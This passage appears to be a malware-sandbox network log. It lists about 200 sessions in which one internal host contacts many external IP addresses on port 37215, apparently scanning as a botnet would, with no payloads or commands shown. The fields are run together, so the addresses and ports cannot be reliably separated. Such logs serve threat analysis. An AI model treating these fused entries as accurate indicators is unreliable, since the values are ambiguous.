                                                  8523192.168.2.1345998157.177.198.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8524192.168.2.133923241.117.81.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8525192.168.2.1353888219.252.133.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8526192.168.2.1344432211.128.202.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8527192.168.2.1351400197.240.137.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8528192.168.2.1343476197.182.34.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8529192.168.2.1341832157.235.68.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8530192.168.2.1341828197.224.114.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8531192.168.2.1336646197.12.221.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8532192.168.2.1352812157.235.123.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8533192.168.2.1347948157.45.246.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8534192.168.2.134774241.3.122.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8535192.168.2.1356766206.252.98.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8536192.168.2.134446441.163.6.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8537192.168.2.1342166157.238.142.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8538192.168.2.133725441.214.67.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8539192.168.2.1343362197.16.250.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8540192.168.2.136074041.129.125.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8541192.168.2.1340592157.170.110.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8542192.168.2.1339358164.98.182.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8543192.168.2.134492241.3.63.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8544192.168.2.1334626196.81.69.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8545192.168.2.1350028157.220.42.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8546192.168.2.1353934197.151.243.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8547192.168.2.1355912152.177.198.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8548192.168.2.1356104201.125.113.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8549192.168.2.1348332197.234.96.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8550192.168.2.135650841.149.165.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8551192.168.2.1357744157.57.204.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8552192.168.2.1358352197.174.160.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8553192.168.2.134262476.61.35.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8554192.168.2.1341326197.105.37.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8555192.168.2.134190097.166.208.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8556192.168.2.1360770197.125.74.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8557192.168.2.1342480197.151.50.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8558192.168.2.1348926177.40.234.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8559192.168.2.133437641.44.43.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8560192.168.2.133972841.175.94.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8561192.168.2.135904841.194.236.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8562192.168.2.1345894197.158.243.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8563192.168.2.1341246129.208.192.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8564192.168.2.1343058197.72.217.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8565192.168.2.1358230197.161.237.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8566192.168.2.13589168.26.254.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8567192.168.2.1333862157.136.104.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8568192.168.2.135629841.162.75.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8569192.168.2.1338284197.44.195.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8570192.168.2.1356884197.55.252.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8571192.168.2.133822441.174.180.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8572192.168.2.1353550197.220.254.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8573192.168.2.1351706157.86.174.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8574192.168.2.135687241.140.18.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8575192.168.2.1338138137.181.64.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8576192.168.2.1351802157.229.101.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8577192.168.2.1344730157.38.48.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8578192.168.2.134603441.163.95.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8579192.168.2.1353892197.231.43.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8580192.168.2.1348574157.222.58.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8581192.168.2.1359792157.75.197.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8582192.168.2.1337878197.250.131.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8583192.168.2.1356290197.125.150.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8584192.168.2.134710441.49.37.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8585192.168.2.1357808197.245.88.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8586192.168.2.134085094.63.74.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8587192.168.2.1344666190.80.70.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8588192.168.2.133360841.158.199.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8589192.168.2.133818032.94.26.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8590192.168.2.1342968197.131.120.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8591192.168.2.1346512157.15.90.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8592192.168.2.1339866112.59.84.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8593192.168.2.134231846.243.67.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8594192.168.2.135619042.176.184.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8595192.168.2.1350626197.57.185.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8596192.168.2.1340572157.36.70.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8597192.168.2.1355016163.173.35.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8598192.168.2.1340416197.192.6.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8599192.168.2.135583268.217.247.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8600192.168.2.1336622157.207.113.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8601192.168.2.1336200157.206.241.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8602192.168.2.135997241.132.83.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8603192.168.2.1354408197.75.92.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8604192.168.2.133301241.128.95.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8605192.168.2.1336812157.84.27.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8606192.168.2.134519688.34.53.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8607192.168.2.1341594197.125.240.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8608192.168.2.135516441.80.157.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8609192.168.2.1357638157.217.62.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8610192.168.2.1339196197.177.40.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8611192.168.2.133751841.27.89.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8612192.168.2.135269241.79.172.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8613192.168.2.1340844197.114.222.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8614192.168.2.134507841.4.112.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8615192.168.2.135482841.40.253.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8616192.168.2.133911441.81.194.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8617192.168.2.1351238197.243.177.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8618192.168.2.133755441.79.176.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8619192.168.2.1333942157.151.81.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8620192.168.2.1335944197.238.67.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8621192.168.2.1347088197.42.56.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8622192.168.2.1358794217.77.189.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8623192.168.2.135134841.123.129.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8624192.168.2.1333478222.76.75.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8625192.168.2.134148841.64.110.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8626192.168.2.1349034197.66.246.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8627192.168.2.135949077.113.8.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8628192.168.2.1359822157.94.2.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8629192.168.2.135692841.52.212.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8630192.168.2.1332932101.39.175.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8631192.168.2.1346940157.234.75.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8632192.168.2.1353124197.166.35.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8633192.168.2.133554037.147.89.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8634192.168.2.1353280189.170.194.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8635192.168.2.1339396157.250.254.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8636192.168.2.1352242173.130.167.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8637192.168.2.1348536197.210.190.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8638192.168.2.1355796112.161.215.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8639192.168.2.1335460157.104.176.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8640192.168.2.1359854197.189.167.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8641192.168.2.136040641.194.144.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8642192.168.2.1359732197.15.41.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8643192.168.2.1349160197.239.47.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8644192.168.2.13608865.12.143.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8645192.168.2.1344732157.13.249.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8646192.168.2.133466441.94.248.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8647192.168.2.1337966197.105.82.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8648192.168.2.1335990188.219.133.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8649192.168.2.135300041.110.163.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8650192.168.2.1337584157.243.147.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8651192.168.2.1357410197.45.124.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8652192.168.2.1353922157.123.186.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8653192.168.2.1350190197.68.75.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8654192.168.2.1335680197.90.85.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8655192.168.2.1352294157.98.171.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8656192.168.2.1344636197.169.2.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8657192.168.2.1335638112.175.245.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8658192.168.2.1344866173.107.173.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8659192.168.2.134307241.175.178.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8660192.168.2.133966641.205.59.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8661192.168.2.1340656136.17.167.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8662192.168.2.135087041.159.200.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8663192.168.2.135763041.101.206.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8664192.168.2.1352500157.91.164.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8665192.168.2.134573041.230.1.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8666192.168.2.1353190157.79.188.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8667192.168.2.1337982157.98.2.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8668192.168.2.1357886197.226.149.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8669192.168.2.1359638157.2.197.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8670192.168.2.1358078156.87.255.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8671192.168.2.133561641.14.5.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8672192.168.2.1337422157.42.69.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8673192.168.2.1355924201.50.114.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8674192.168.2.1333650197.130.224.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8675192.168.2.1345682157.67.111.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8676192.168.2.134809041.24.160.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8677192.168.2.134389041.108.225.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8678192.168.2.1339478197.53.99.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8679192.168.2.1349014197.197.171.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8680192.168.2.1359000197.44.247.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8681192.168.2.133602241.42.246.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8682192.168.2.133392041.168.229.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8683192.168.2.1345860197.116.36.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8684192.168.2.135466842.237.154.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8685192.168.2.134634241.177.169.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8686192.168.2.1336620197.53.71.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8687192.168.2.135079441.41.41.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8688192.168.2.135268041.219.118.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8689192.168.2.1355486197.126.75.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8690192.168.2.1352938157.39.147.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8691192.168.2.135539652.2.101.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8692192.168.2.133434097.79.140.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8693192.168.2.1343470157.176.79.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8694192.168.2.1346242197.153.49.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8695192.168.2.1349550157.247.79.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8696192.168.2.135240662.116.127.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8697192.168.2.1355482197.115.161.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8698192.168.2.133285041.85.54.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8699192.168.2.133974441.205.73.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8700192.168.2.1352430157.214.202.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8701192.168.2.1335624197.238.207.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8702192.168.2.1344252157.251.135.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8703192.168.2.134460841.252.191.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8704192.168.2.135199041.24.58.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8705192.168.2.134854241.87.142.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8706192.168.2.134254641.75.102.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8707192.168.2.1335184157.104.41.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8708192.168.2.1350276157.240.230.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8709192.168.2.133737641.120.133.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8710192.168.2.1344616157.31.144.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8711192.168.2.1353110103.14.15.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8712192.168.2.1338694199.117.203.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8713192.168.2.1356756197.221.105.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8714192.168.2.134923241.223.2.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8715192.168.2.1353070157.59.191.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8716192.168.2.1349108157.217.234.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8717192.168.2.135346441.130.44.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8718192.168.2.1342498157.168.190.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8719192.168.2.1358434157.197.163.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8720192.168.2.1343480157.210.54.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8721192.168.2.134542619.63.22.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8722192.168.2.1350438157.201.167.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8723192.168.2.133806841.47.206.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8724192.168.2.135926041.212.254.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8725192.168.2.1352000185.90.239.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8726192.168.2.135240241.203.253.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8727192.168.2.1348158173.161.202.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8728192.168.2.1335142121.174.134.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8729192.168.2.134158441.251.124.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8730192.168.2.1349286197.149.186.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8731192.168.2.1336494142.183.107.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8732192.168.2.135130441.242.99.4037215
